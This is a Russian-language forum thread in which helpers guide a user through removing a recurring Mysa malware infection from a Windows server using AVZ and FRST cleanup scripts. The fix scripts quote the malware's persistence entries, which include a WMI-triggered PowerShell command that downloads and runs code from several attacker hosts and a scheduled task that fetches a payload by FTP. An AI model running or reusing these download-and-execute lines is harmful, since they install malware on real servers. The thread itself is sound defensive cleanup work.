ARDEV_AST 0 Опубликовано 28 октября, 2022 Share Опубликовано 28 октября, 2022 Добрый день! На Windows Server 2008 появился вирус Mysa 1, Mysa 2, Ok, Okaa. Запускается через планировщик задач. Меняет первичный DNS на сетке и скачивает файл по FTP. Блокирует 445 и 139 порты через Брендмауэр. При удалении вирус появляется снова через 3 часа примерно либо сразу после перезагрузки сервера. Переустановка ОС на 2012 не помогло. Cureit и KVRT сканирует находит вирусы и лечит, однако вирус снова появляется через 3 часа. Другие антивирусы не устанавливаются. Браузер тоже не дает запустить. Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 28 октября, 2022 Share Опубликовано 28 октября, 2022 Здравствуйте! Прочтите и выполните Порядок оформления запроса о помощи Цитата Ссылка на сообщение Поделиться на другие сайты
ARDEV_AST 0 Опубликовано 28 октября, 2022 Автор Share Опубликовано 28 октября, 2022 3 часа назад, ARDEV_AST сказал: Добрый день! На Windows Server 2008 появился вирус Mysa 1, Mysa 2, Ok, Okaa. Запускается через планировщик задач. Меняет первичный DNS на сетке и скачивает файл по FTP. Блокирует 445 и 139 порты через Брендмауэр. При удалении вирус появляется снова через 3 часа примерно либо сразу после перезагрузки сервера. Переустановка ОС на 2012 не помогло. Cureit и KVRT сканирует находит вирусы и лечит, однако вирус снова появляется через 3 часа. Другие антивирусы не устанавливаются. Браузер тоже не дает запустить. CollectionLog-2022.10.28-12.20.zip Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 28 октября, 2022 Share Опубликовано 28 октября, 2022 (изменено) Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Отключите на время лечения сервер от локальной сети. Выполните скрипт в AVZ (Файл - Выполнить скрипт): begin TerminateProcessByName('C:\Windows\Inf\aspnet\lsma22.exe'); TerminateProcessByName('c:\windows\system\msinfo.exe'); TerminateProcessByName('c:\windows\temp\conhoy.exe'); QuarantineFile('c:\windows\debug\item.dat', ''); QuarantineFile('c:\windows\debug\ok.dat', ''); QuarantineFile('C:\Windows\Inf\aspnet\lsma22.exe', ''); QuarantineFile('c:\windows\system\msinfo.exe', ''); QuarantineFile('C:\Windows\system32\csrs.exe', ''); QuarantineFile('C:\Windows\syswow64\csrs.exe', ''); QuarantineFile('c:\windows\temp\conhoy.exe', ''); DeleteSchedulerTask('MicrosoftsWindowsy'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('ok'); DeleteSchedulerTask('oka'); DeleteFile('c:\windows\debug\item.dat', ''); DeleteFile('c:\windows\debug\item.dat', '64'); DeleteFile('c:\windows\debug\ok.dat', '64'); DeleteFile('C:\Windows\Inf\aspnet\lsma22.exe', '32'); DeleteFile('c:\windows\inf\aspnet\lsma22.exe', '64'); DeleteFile('c:\windows\system\msinfo.exe', '32'); DeleteFile('C:\Windows\system32\csrs.exe', ''); DeleteFile('C:\Windows\syswow64\csrs.exe', ''); DeleteFile('c:\windows\temp\conhoy.exe', ''); DeleteFile('c:\windows\temp\conhoy.exe', '64'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteRepair(9); end. Пожалуйста, перезагрузите компьютер вручную. Закройте общие ресурсы: Цитата G:\DN C:\Users C:\Y "Пофиксите" в HijackThis только это: O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://155.94.235.39:8039/power.txt')" Для повторной диагностики запустите снова AutoLogger. Прикрепите новый CollectionLog. Остальные компьютеры в локальной сети тоже следует пролечить, например, с помощью KVRT. Изменено 28 октября, 2022 пользователем Sandor Цитата Ссылка на сообщение Поделиться на другие сайты
ARDEV_AST 0 Опубликовано 28 октября, 2022 Автор Share Опубликовано 28 октября, 2022 Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 28 октября, 2022 Share Опубликовано 28 октября, 2022 Это потому, что вы не читаете инструкции. Запускать нужно эту версию AVZ: Цитата G:\DN\PROJECT\AutoLogger\AutoLogger\AV\av_z.exe Цитата Ссылка на сообщение Поделиться на другие сайты
ARDEV_AST 0 Опубликовано 28 октября, 2022 Автор Share Опубликовано 28 октября, 2022 CollectionLog-2022.10.28-13.33.zip Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 28 октября, 2022 Share Опубликовано 28 октября, 2022 Дополнительно: Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе. Когда программа запустится, нажмите Да для соглашения с предупреждением. Нажмите кнопку Сканировать (Scan). После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Подробнее читайте в этом руководстве. Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 28 октября, 2022 Share Опубликовано 28 октября, 2022 59 минут назад, Sandor сказал: Закройте общие ресурсы Эти ресурсы по-прежнему открыты. Цитата Ссылка на сообщение Поделиться на другие сайты
ARDEV_AST 0 Опубликовано 28 октября, 2022 Автор Share Опубликовано 28 октября, 2022 Нужно закрыть общий доступ? Addition.txt FRST.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 28 октября, 2022 Share Опубликовано 28 октября, 2022 6 минут назад, ARDEV_AST сказал: Нужно закрыть общий доступ? Да, обязательно, по крайней мере на время лечения. А также, повторю, обязательно пролечите остальные компьютеры в локальной сети. Отключите до перезагрузки антивирус. Выделите следующий код: Start:: CloseProcesses: (services.exe ->) (Microl office) [Файл не подписан] C:\Windows\System\msinfo.exe (svchost.exe ->) (www.google.com) [Файл не подписан] C:\Windows\Inf\aspnet\lsma22.exe (winlogon.exe ->) () [Файл не подписан] C:\Windows\Temp\conhoy.exe <2> IFEO\uihost32.exe: [Debugger] ntsd -d IFEO\uihost64.exe: [Debugger] ntsd -d IFEO\vid001.exe: [Debugger] ntsd -d Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ Task: {0E294A8E-7728-43A7-90BF-02C6C7F4518B} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ВНИМАНИЕ Task: {2A359626-624C-4AE5-9047-8578174BA8FF} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe [7680 2022-10-28] () [Файл не подписан] <==== ВНИМАНИЕ Task: {B014DEA5-1368-4AD4-BA65-F4AE0E48812E} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ВНИМАНИЕ Task: {E797E12A-39D5-4BB2-BC69-ED6EFDEBD750} - System32\Tasks\oka => c:\windows\inf\aspnet\lsma22.exe [1709568 2022-10-28] (www.google.com) [Файл не подписан] Task: {F52ACB45-234B-451C-816C-6027C02CA9D4} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ВНИМАНИЕ R2 xWinWpdSrv; c:\windows\system\msinfo.exe [7277056 2022-10-28] (Microl office) [Файл не подписан] 2022-10-28 13:37 - 2022-10-28 13:37 - 000003450 _____ C:\Windows\system32\Tasks\Mysa1 2022-10-28 13:37 - 2022-10-28 13:37 - 000003446 _____ C:\Windows\system32\Tasks\ok 2022-10-28 13:37 - 2022-10-28 13:37 - 000003422 _____ C:\Windows\system32\Tasks\Mysa2 2022-10-28 13:37 - 2022-10-28 13:37 - 000003344 _____ C:\Windows\system32\Tasks\oka 2022-10-28 13:37 - 2022-10-28 13:37 - 000003332 _____ C:\Windows\system32\Tasks\MicrosoftsWindowsy 2022-10-28 00:09 - 2022-10-28 00:09 - 006466100 _____ (Microsoft Corporation) C:\Windows\SysWOW64\csrs.exe WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\":: WMI:subscription\__EventFilter->killmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] WMI:subscription\CommandLineEventConsumer->killmm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http:/ (запись имеет ещё 362 символов).] 2022-10-28 13:37 - 2022-10-28 13:37 - 004122624 _____ () [Файл не подписан] c:\windows\debug\item.dat FirewallRules: [{E73C64F9-DA37-4D1A-8665-E8649016BFAC}] => (Block) LPort=445 FirewallRules: [{8709D4A8-BBF2-48E8-B13E-8D8CE5D3239E}] => (Block) LPort=139 End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер перезагрузите вручную. Подробнее читайте в этом руководстве. Цитата Ссылка на сообщение Поделиться на другие сайты
ARDEV_AST 0 Опубликовано 28 октября, 2022 Автор Share Опубликовано 28 октября, 2022 Обеденный перерыв у сотрудников закончился. Продолжу вечером. Спасибо за помощь. Вечером обязательно дам обратную связь. Цитата Ссылка на сообщение Поделиться на другие сайты
ARDEV_AST 0 Опубликовано 30 октября, 2022 Автор Share Опубликовано 30 октября, 2022 Fixlog.txt В планировщике снова появилась эта зараза Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 30 октября, 2022 Share Опубликовано 30 октября, 2022 Пролечите компьютер при помощи Kaspersky Virus Removal Tools Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.